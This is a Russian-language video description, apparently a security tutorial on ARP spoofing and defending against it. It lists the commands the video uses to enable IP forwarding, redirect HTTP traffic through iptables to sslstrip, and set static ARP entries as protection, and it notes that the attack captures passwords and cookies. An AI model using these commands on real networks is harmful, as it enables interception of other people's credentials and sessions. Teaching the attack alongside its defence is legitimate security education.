Ссылки:\r<br>Обсудить компьютерную безопасность можно на моем новом форуме в этой ветке - \r<br>Взлом и защита wi-fi - \r<br>Загрузочная флешка на все случаи жизни - \r<br>Wireshark, взлом и защита в открытых wi-fi сетях - \r<br>Файлы куки, cookie, что это такое? Наглядно - \r<br>\r<br>Загрузка Kali linux - \r<br>Описание протокола ARP - \r<br>\r<br>HTTPS Everywhere - \r<br>\r<br>Команды используемые в видео:\r<br>---------------------------------------------------------------------------------------------\r<br>Включаем форвардинг ip-forwarding пакетов:\r<br>echo 1 (здесь знак меньше) /proc/sys/net/ipv4/ip_forward\r<br>\r<br>Настраиваем IPtables для перенаправления интернет трафика. С 80 порта на любой другой, у меня это 8080 порт :\r<br>iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080\r<br>\r<br>Запускаем SSLstrip на просушку заданного нами порта:\r<br>sslstrip -l 8080\r<br>---------------------------------------------------------------------------------------------\r<br>Создаем статический маршрут. Два варианта:\r<br>arp -s 192.168.1.1 xx-xx-xx-xx-xx-xx\r<br>Если первый не сработал то вот второй вариант:\r<br>netsh interface ipv4 add neighbors Подключение по локальной сети 192.168.1.1 xx-x-xx-xx-xx-xx\r<br>\r<br>В этом видео я постарался подробно рассказать про так называемый ARP-спуфинг (arp-spoofing) и защиту от него. Это атака благодаря которой можно украсть пароль от сайта, перехватить cookie или сессии, скомпроментировать работу через защищенное подключение HTTPS и многое другое. В видео я использовал Kali Linux 1.0.6, ettercap-graphical, sslstrip, webspy и прочие инструменты. Вы также узнаете что такое ARP-протокол и MAC-адрес. Надеюсь что вам будет интересно!